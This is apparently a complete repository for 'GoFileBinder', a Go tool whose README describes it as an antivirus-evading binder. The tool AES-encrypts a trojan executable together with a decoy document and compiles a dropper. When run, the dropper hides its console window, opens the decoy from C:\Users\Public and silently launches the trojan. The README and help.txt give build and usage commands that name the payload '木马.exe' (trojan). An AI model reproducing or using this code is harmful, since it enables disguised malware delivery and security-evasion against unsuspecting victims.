├── GoFileBinder.go ├── README.md └── help.txt /GoFileBinder.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "encoding/base64" 8 | "fmt" 9 | "io/ioutil" 10 | "log" 11 | "math/rand" 12 | "os" 13 | "os/exec" 14 | "path/filepath" 15 | "strings" 16 | "time" 17 | ) 18 | 19 | var ( 20 | logo = ` 21 | \__ | | | |__ _____|__|_ _ __ ____ |__| 22 | / | | | | \ / ___/ \ \/ \/ // __ \| | 23 | \____ | | Y \\___ \| |\ /\ ___/| | 24 | / ______|___|___| /____ >__| \/\_/ \___ >__| 25 | \/ \/ \/ \/ 26 | ` 27 | tvb = "这是我的频道欢迎投稿学习:https://space.bilibili.com/353948151 " 28 | 29 | tishi = ` 30 | 命令参数如: main.exe ma.exe xxx.doc 31 | main.exe ma.exe xxx.doc ico.syso 32 | ` 33 | ) 34 | 35 | func RandStr(length int) string { 36 | str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 37 | bytes := []byte(str) 38 | result := []byte{} 39 | rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100))) 40 | for i := 0; i < length; i++ { 41 | result = append(result, bytes[rand.Intn(len(bytes))]) 42 | } 43 | return string(result) 44 | } 45 | func main() { 46 | fmt.Println(logo) 47 | fmt.Println(tvb) 48 | 49 | if len(os.Args) != 3 && len(os.Args) != 4{ 50 | fmt.Println(tishi) 51 | return 52 | } 53 | mumafile := os.Args[1] 54 | docfile := os.Args[2] 55 | key := RandStr(16) 56 | 57 | info, _ := ioutil.ReadFile(mumafile) 58 | var mumafileStr string = string(info[:]) 59 | AesmumafileStr := AesEncrypt(mumafileStr, key) 60 | 61 | infodoc, _ := ioutil.ReadFile(docfile) 62 | var docfileStr string = string(infodoc[:]) 63 | AesdocfileStr := AesEncrypt(docfileStr, key) 64 | SourceCode := fmt.Sprintf(`package main 65 | import ( 66 | "crypto/aes" 67 | "crypto/cipher" 68 | "encoding/base64" 69 | "os" 70 | "os/exec" 71 | "reflect" 72 | "strings" 73 | "syscall" 74 | "github.com/lxn/win" 75 | ) 76 | 77 | var ( 78 | jian = "%s" 79 | mumawenjianname = "%s" 80 | docwenjianname = "%s" 81 | docwenjiannames = "%s" 82 | docwenjian = "%s" 83 | 84 | numawenjian = "%s" 85 | dstdawenjian = "ffff.DAT" 86 | selwenjian, _ = os.Executable() 87 | ddocwenjian = str_func(aesjiami,docwenjian, jian)[0].String() 88 | 89 | dmumawenjian = str_func(aesjiami,numawenjian, jian)[0].String() 90 | ) 91 | 92 | func main() { 93 | win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) 94 | a,_ := os.Getwd() 95 | b := os.Args[0] 96 | c := strings.Replace(b,a,"",-1) 97 | dstdawenjian = c 98 | 99 | panfu := selwenjian[0:2] 100 | if !strings.Contains(selwenjian, "C:") { 101 | 102 | dstdawenjian = panfu + "\\ffff.DAT" 103 | } else { 104 | dstdawenjian = panfu + dstdawenjian 105 | } 106 | 107 | //os.Rename(selwenjian, dstdawenjian) 108 | 109 | 110 | f2, _ := os.Create("C:\\Users\\Public\\" + docwenjianname) 111 | _, _ = f2.Write([]byte(ddocwenjian)) 112 | f2.Close() 113 | 114 | 115 | cmd := exec.Command("cmd", " /c ","C:\\Users\\Public\\"+docwenjiannames) 116 | 117 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 118 | //cmd2.Stdout = os.Stdout 119 | _ = cmd.Start() 120 | var dstFilecc = "C:\\Users\\Public\\" + mumawenjianname 121 | f, _ := os.Create(dstFilecc) 122 | _, _ = f.Write([]byte(dmumawenjian)) 123 | f.Close() 124 | 125 | 126 | _, err := os.Stat(dstFilecc) 127 | 128 | if err == nil { 129 | 130 | cmda := exec.Command(dstFilecc) 131 | _ = cmda.Start() 132 | 133 | } 134 | 135 | 136 | } 137 | 138 | func Pdaing(org []byte) []byte { 139 | length := len(org) 140 | unpadding := int(org[length-1]) 141 | return org[:(length - unpadding)] 142 | } 143 | func aesjiami(can1 string, key string) string { 144 | kuashuzu, _ := base64.StdEncoding.DecodeString(can1) 145 | k := []byte(key) 146 | blo, _ := aes.NewCipher(k) 147 | blodaxiao := blo.BlockSize() 148 | blomoshi := cipher.NewCBCDecrypter(blo, k[:blodaxiao]) 149 | org := make([]byte, len(kuashuzu)) 150 | blomoshi.CryptBlocks(org, kuashuzu) 151 | org = str_func(Pdaing,org)[0].Bytes() 152 | return string(org) 153 | } 154 | 155 | func str_func(hanshu interface{}, canshu ...interface{}) []reflect.Value { 156 | //将函数包装为反射值对象 157 | funcValue := reflect.ValueOf(hanshu) 158 | //构造函数参数 159 | paramList := []reflect.Value{} 160 | for i := 0; i < len(canshu); i++ { 161 | paramList = append(paramList, reflect.ValueOf(canshu[i])) 162 | } 163 | //调用函数 164 | jieguo := funcValue.Call(paramList) 165 | //返回结果 166 | return jieguo 167 | } 168 | `, key, mumafile, docfile, docfile, AesdocfileStr, AesmumafileStr) 169 | 170 | lujing := "" 171 | comm := "go build main.go" 172 | lujing2 := "" 173 | 174 | if len(os.Args) == 4 { 175 | os.Mkdir("./main", os.ModePerm) 176 | lujing = "./main/" 177 | lj, _ := os.Getwd() 178 | lujing2 = lj+"\\main\\" 179 | comm = "cd "+ lujing2 + " && go build" 180 | if strings.HasSuffix(os.Args[3],".syso") { 181 | nr,err := ioutil.ReadFile(os.Args[3]) 182 | if err != nil { 183 | return 184 | } 185 | f, _ := os.Create(lujing + "ico.syso") 186 | _, _ = f.Write(nr) 187 | f.Close() 188 | exitfile(lujing + "ico.syso") 189 | time.Sleep(time.Duration(1) * time.Second) 190 | }else { 191 | return 192 | } 193 | } 194 | 195 | f, _ := os.Create(lujing + "main.go") 196 | _, _ = f.Write([]byte(SourceCode)) 197 | f.Close() 198 | exitfile(lujing +"main.go") 199 | time.Sleep(time.Duration(1) * time.Second) 200 | 201 | batfile, _ := os.Create(lujing +"Yihsiwei.bat") 202 | 203 | _, _ = batfile.Write([]byte(comm)) 204 | batfile.Close() 205 | exitfile(lujing +"Yihsiwei.bat") 206 | time.Sleep(time.Duration(1) * time.Second) 207 | cmd := exec.Command(lujing2 +"Yihsiwei.bat") 208 | cmd.Start() 209 | 210 | exitfile(lujing +"main.exe") 211 | os.RemoveAll(lujing +"main.go") 212 | os.RemoveAll(lujing +"Yihsiwei.bat") 213 | os.RemoveAll(lujing +"tubiao.syso") 214 | 215 | } 216 | func exitfile(filename string) { 217 | for { 218 | fmt.Println(filename) 219 | time.Sleep(time.Duration(1) * time.Second) 220 | _, err := os.Stat(GetCurrentDirectory() + "/" + filename) 221 | //fmt.Println(err) 222 | if err == nil { 223 | break 224 | } 225 | } 226 | } 227 | func GetCurrentDirectory() string { 228 | dir, err := filepath.Abs(filepath.Dir(os.Args[0])) 229 | if err != nil { 230 | log.Fatal(err) 231 | } 232 | 233 | return strings.Replace(dir, "\\", "/", -1) 234 | } 235 | func PKCS7Padding(ciphertext []byte, blocksize int) []byte { 236 | padding := blocksize - len(ciphertext)%blocksize 237 | padtext := bytes.Repeat([]byte{byte(padding)}, padding) 238 | return append(ciphertext, padtext...) 239 | } 240 | 241 | func AesEncrypt(orig string, key string) string { 242 | origData := []byte(orig) 243 | k := []byte(key) 244 | block, _ := aes.NewCipher(k) 245 | blockSize := block.BlockSize() 246 | origData = PKCS7Padding(origData, blockSize) 247 | blockMode := cipher.NewCBCEncrypter(block, k[:blockSize]) 248 | cryted := make([]byte, len(origData)) 249 | blockMode.CryptBlocks(cryted, origData) 250 | return base64.StdEncoding.EncodeToString(cryted) 251 | } 252 | 253 | 254 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GoFileBinder 2 | 3 | golang免杀捆绑器 捆绑器免杀效果会持续更新下去 4 | 使用以下命令进行捆绑器编译 5 | `go build GoFileBinder.go` 6 | 7 | 使用以下命令生成捆绑文件(注:GoFileBinder.exe单独放入一个文件夹中) 8 | `GoFileBinder.exe 木马.exe xxx.txt` 9 | 10 | 可以在我的频道中看到详细使用哦 11 | `https://space.bilibili.com/353948151` 12 | 视频中提到的key现在已经不用手动了 13 | 14 | 非常感谢嘟嘟提出项目bug问题以及优化方案 15 | 16 | 17 | 18 | ### 修改: 19 | 20 | * 修改捆绑的程序执行后不会删除 21 | * 加入ico图标的exe生成 22 | * 取消-ldflags="-H windowsgui"隐藏黑窗口,改用代码实现,增强免杀效果 23 | 24 | go get github.com/lxn/win 25 | 26 | GoFileBinder.exe 木马.exe 捆绑文件 27 | 28 | GoFileBinder.exe 木马.exe 捆绑文件 syso文件 29 | 30 | 31 | 32 | syso文件生成: 33 | 34 | ​ https://wanghaiqing.com/mobile/article/b92edef6-61bc-431b-af41-b813bc6a5e8c/ 35 | -------------------------------------------------------------------------------- /help.txt: -------------------------------------------------------------------------------- 1 | go get github.com/lxn/win 2 | go build GoFileBinder.go 3 | GoFileBinder.exe 木马.exe 捆绑文件 4 | GoFileBinder.exe 木马.exe 捆绑文件 ico图标文件 --------------------------------------------------------------------------------